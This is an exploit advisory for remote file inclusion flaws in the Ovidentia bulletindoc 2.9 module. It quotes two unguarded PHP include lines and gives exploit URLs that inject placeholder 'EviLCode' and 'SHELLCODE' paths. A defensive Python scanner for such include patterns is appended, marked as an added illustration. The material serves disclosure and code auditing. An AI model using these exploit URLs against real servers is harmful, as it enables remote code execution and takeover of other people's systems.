Ovidentia bulletindoc 2.9 Remote File Inclusion

2015.12.16
Credit: bd0rk
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792

PoC1:

/bulletindoc-2-9/programs/admin.php line 2
------------------------------------------------------
include $babInstallPath."admin/acl.php";
------------------------------------------------------

[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]

Description: The $babInstallPath-parameter isn't declared before include.
             So an attacker can execute evil-code 'bout this.

PoC2:

/bulletindoc-2-9/programs/main.php line 2
-------------------------------------------------------
require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");
-------------------------------------------------------

[+]Sploit2: http://[s0me0ne]/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?

Description: The problem is the same as the first. -.-
             It's possible to compromise the system.

### The 27 years old, german hacker bd0rk ###

Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm
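Added example, not part of the advisory or of the Ovidentia code base: a heuristic Python audit that flags include/require statements whose path starts with a variable the same file has not assigned earlier, which is the pattern both PoCs describe. The function names, sample file contents and the hardened variant are constructed for illustration.

```python
import re

Q = r"""['"]?"""  # optional quote around a $GLOBALS key

# include/require whose path expression starts with a variable,
# written either as $name or as $GLOBALS['name'].
INCLUDE_RE = re.compile(
    r"\b(include_once|include|require_once|require)\b\s*\(?\s*"
    r"(?:\$GLOBALS\[\s*" + Q + r"(\w+)" + Q + r"\s*\]|\$(\w+))"
)


def assigned_before(name, preceding):
    """True if `preceding` assigns $name or $GLOBALS['name'] (not ==, =>)."""
    n = re.escape(name)
    pattern = r"(?:\$%s\b|\$GLOBALS\[\s*%s%s%s\s*\])\s*=(?![=>])" % (n, Q, n, Q)
    return re.search(pattern, preceding) is not None


def find_unset_include_vars(source, filename):
    """Return (filename, line, construct, variable) for each include/require
    whose leading path variable has no assignment earlier in the same file.
    Heuristic: regex only, so comments and strings are not parsed out."""
    findings = []
    for m in INCLUDE_RE.finditer(source):
        name = m.group(2) or m.group(3)
        if not assigned_before(name, source[:m.start()]):
            line = source.count("\n", 0, m.start()) + 1
            findings.append((filename, line, m.group(1), name))
    return findings


# Constructed sample files: the two statements quoted in the advisory,
# placed on line 2 as reported, plus a constructed hardened variant.
ADMIN_PHP = '<?php\ninclude $babInstallPath."admin/acl.php";\n'
MAIN_PHP = "<?php\nrequire_once( $GLOBALS['babAddonPhpPath'].\"fonctions.php\");\n"
HARDENED_PHP = (
    "<?php\n"
    "$babInstallPath = dirname(__DIR__, 2) . '/';  // server-side value (hypothetical layout)\n"
    'include $babInstallPath."admin/acl.php";\n'
)

if __name__ == "__main__":
    samples = {"programs/admin.php": ADMIN_PHP, "programs/main.php": MAIN_PHP,
               "hardened/admin.php": HARDENED_PHP}
    for path, src in samples.items():
        for hit in find_unset_include_vars(src, path):
            print("%s:%d: %s uses $%s before any assignment" % hit)
```

A hit means the include path depends on whatever set the variable outside the file, so each one needs manual review of how the script can be reached directly.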

